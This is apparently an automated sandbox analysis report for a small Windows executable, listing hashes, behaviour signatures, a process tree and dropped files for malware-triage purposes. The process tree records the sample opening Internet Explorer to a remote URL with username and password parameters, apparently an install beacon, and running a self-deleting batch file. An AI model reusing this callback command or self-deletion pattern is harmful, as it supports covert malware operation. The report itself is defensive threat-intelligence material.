Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

2d185e185f...86.exe

windows7-x64

7

2d185e185f...86.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    122s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    31/12/2023, 07:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2d185e185fb7a90352691eec7f985f86.exe

  • Size

    2KB

  • MD5

    2d185e185fb7a90352691eec7f985f86

  • SHA1

    be6c98e640cc64e150dae810b82f9ae11adc30bd

  • SHA256

    5a33592ded6af9ac95be4c4dd7d4e82e2fe801de57c74d590ca6d8fb3c7b42c1

  • SHA512

    947811ee7f9f3abe29b99f294fbefdea378b1d0817ac2aaf61fb253ace197d97a63849af07de96a55ddde6713b1a3c1eca67db57e2a0b5a010b89b97868e4ae8

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d185e185fb7a90352691eec7f985f86.exe
    "C:\Users\Admin\AppData\Local\Temp\2d185e185fb7a90352691eec7f985f86.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://ffies.cn/baiyu/data/user.asp?username=baiyu01&password=QVMRJQQO&djwy=成功安装&op_type=add&submit=ok
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2168 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2980
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\kill.bat""
      2⤵
      • Deletes itself
      PID:2768

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    6a0b515fc70685b3e34a448694e65fc7

    SHA1

    0bfa7a7db6decc2799407932491dfbc8fe05c82f

    SHA256

    c74f2a27d79f91ef2b6246472e1d995fe53fa2b548bcaf8f88238c171243aea7

    SHA512

    e792265688b308c42911bcf574d25187ae1e4c5f03165ddcb90221f694404a264299d8a8ff02a4deb08ab4c4f14648144aab512a9d4f73d044319cb5b618a28e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    e9908107a1bb05503b7d444478ed1f91

    SHA1

    038eff4155cdcc7176df1dd7a007be1688e11888

    SHA256

    f991b27525561e8169c5117fcc6b14aa11dc179886e386f7d275a8cacdf078aa

    SHA512

    ef4ed286d208a69acc234e59a06a48011ccca79c536ee2869345b5f84edd8862bfb6e4b1dd36fe1611a20f110de86ba85e7124fe4adfb2fcaba3977c8a60bbbf

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    1496aeec722793fe8f2f2ac71fef5248

    SHA1

    2f6ed7a4d28a371e666bdb78634a6e0fbf611db4

    SHA256

    acec82cae5a091049f6bd0365fb5f613c32e7219f455009a6d6a25b140991a04

    SHA512

    132f4024cfb1db548a4172bdf71ab8243671a92a7aa2713572251a896b48a06c06d2e531f74416502459c27ef6638f243cadd2c3c034455621ab3deef80dd079

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c9114177676f1af58ccf8e35d416f76c

    SHA1

    8a0cece4aa14de859273f5d60b83bdc4ed19cc54

    SHA256

    f063a132d8df9009232191bcf956fe30e7a5bbec52e55695214feeae4f5442bf

    SHA512

    636530424468cd1ab6f0963d100b547eae9ce753da1a3b32d32f4b9bbfee9a51abea525af265f6eef25c57b266ca13c08a6c633ebebd77f83da4920391d8f969

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    e1cbe3a68e911b93e7a2b2233e492713

    SHA1

    b5d7c895f7a512ec1cbfac2aefbfcbcf9622d405

    SHA256

    fd9904c8cc37c6b3f261909b8e4eb95ba4bcb5d84016dbc19e81837adb9de07a

    SHA512

    0fcaffaee998ffe95ff2cc3dd5cb2ea51d7f9a89804390b2fd562f143c193d65fc013967b2221418cc4b96d95f5298bef4ffdc234de836d8b1d98ab51c401f20

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    0fb0d9b00740e5b05c11a6a4b36a13d7

    SHA1

    2bad35d7536b53a5b728e689f6578c6bd391832f

    SHA256

    adb079868f1e671331d2667e8469545b6f2960b3a07f361bf17b11aad2b78607

    SHA512

    7e1e0c23b997047e3843301ae0a61cbe81cfa501162ef35c5f27a7c4cb77ca25c11e1d57eff0f87501c86be1d538f86877c07d204efa208daa160ab952671919

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    f6ced7e24c1501084e36319620f8788a

    SHA1

    71cde880ff4ca86be05fc67cad6ea3ed3fd40ec7

    SHA256

    693299aa8f16187da505959d1b7f08ad037bc6d3e5631ae68605e58a9a2b7ac6

    SHA512

    3ce8188f07ed0e9817b69741a838df6c0d17bdad20f5feea980e119912a55de95f519342d84afd94987265819d16c9776c979df0ec358d10e5d64e4d439415d8

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c9c5bfa9561105834236c4844f0e0824

    SHA1

    30463c0ff4c00676a470691ac3ef12283b82258e

    SHA256

    818cd3ac94fb090fef01ff65b4dde4b1cd60181901bf011a0d5bdc3347cee906

    SHA512

    04c3001be688f6622edc18744b55c7ede8eb7106898732511d8b7c7f13eea17fa83316564e36a79a6fda9424e17d22ced7657fc91b410b7a8b239dc529d95d23

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    16a3b576058f006de39d2779563ff33a

    SHA1

    d3fe157e2e0aad8dbe87930b92b58b730732d33e

    SHA256

    f761a0d4144e8c40c39ba3d43a5d2d60dbeeb69da223bc2f28c544ff3fd1531e

    SHA512

    0c2bccc2547b352b9c6b243e3e931fded7b9b553521118d396842d8f22d241788eb41871cd104288b8eb125dc78392b19d6a6875937df0f502a50b32ea52de51

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    897bfcc29cb14885e3621c585ba8393d

    SHA1

    0c2c46a7ae0cca1684d98739d080711384138a8e

    SHA256

    8431608355fcfe5508b7bbce135213145aa7dc113bf10d40104e6dfaf150a94a

    SHA512

    47f229d37bb42f76625348c132747ee964e4a5020ccb5ff0e26a3553d24aaa96619b906338b3595b1a70fcd768e67ba50777bb897172cd61d173b2b4f9b9734b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    68e3197d416caba6ea7ea5af60bd55d5

    SHA1

    346f129c06f4f01ee6142f477f71eb6250a2b50f

    SHA256

    df4ad3015eb3ef104a79979a7ac06bf529f09bd7a426b458200f3e7011eb3104

    SHA512

    a996e138801793ff8d7bbcb8c6cec082c838a96c3aefb7a9840f4e57a3817354653ffbccc7011695aad4ea1db3a532efb818dd617bc587a20ff14ec17de8d41b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    b5d57d8535550f5ab9b2b07b2254435f

    SHA1

    908a3ba8e9795bfe086dd0e2a332511e4132283d

    SHA256

    8975893e69e439b6c578d0f5e215e8e2fed40a9996fb7da91c1d6e3029d2f2f1

    SHA512

    35758d12dcd6def0645fd8a0662068b8ff48b3bd8ea54a06796ff73548a07a7ff46916504cf8650295b5678df81ca9423630f489a4d3e8bd8be30522ea5605e8

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    674f2b864b154ad77221312a70e67251

    SHA1

    f6a9004b194113a407a156c7e586cbaef8d6ba56

    SHA256

    1b88a081791c6abee7794d2e1ed231790bebc2662787791cc6c5d32a57a13e31

    SHA512

    ff6a81b8caf57bd237fe32b438bc0890ccdb8959f3d873e607b6065f6d1bcc0c9ac513d30a3d9a54deb852ad18a3a2528c3e296904005198b83cccafec92f396

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabBD0B.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarBE08.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\kill.bat
    Filesize

    190B

    MD5

    d4f1706aa7dbc17fa516f61eede0c17a

    SHA1

    95ba46425d47621dd494a2cc54157c62e6c06573

    SHA256

    1ac64613c849858f8a847ce022534dbeb92e75412ef5b6080f332cd7004787fa

    SHA512

    19496f69510009042fde66962688f4b67800019d0dd63a4003cf0d1f78400c6d62ed9ccdc34ec9eb1a649fd67c2e38f8db1a063b8ea2c4ce32f58f0dd8482470

    Download Submit

  • memory/1180-9-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download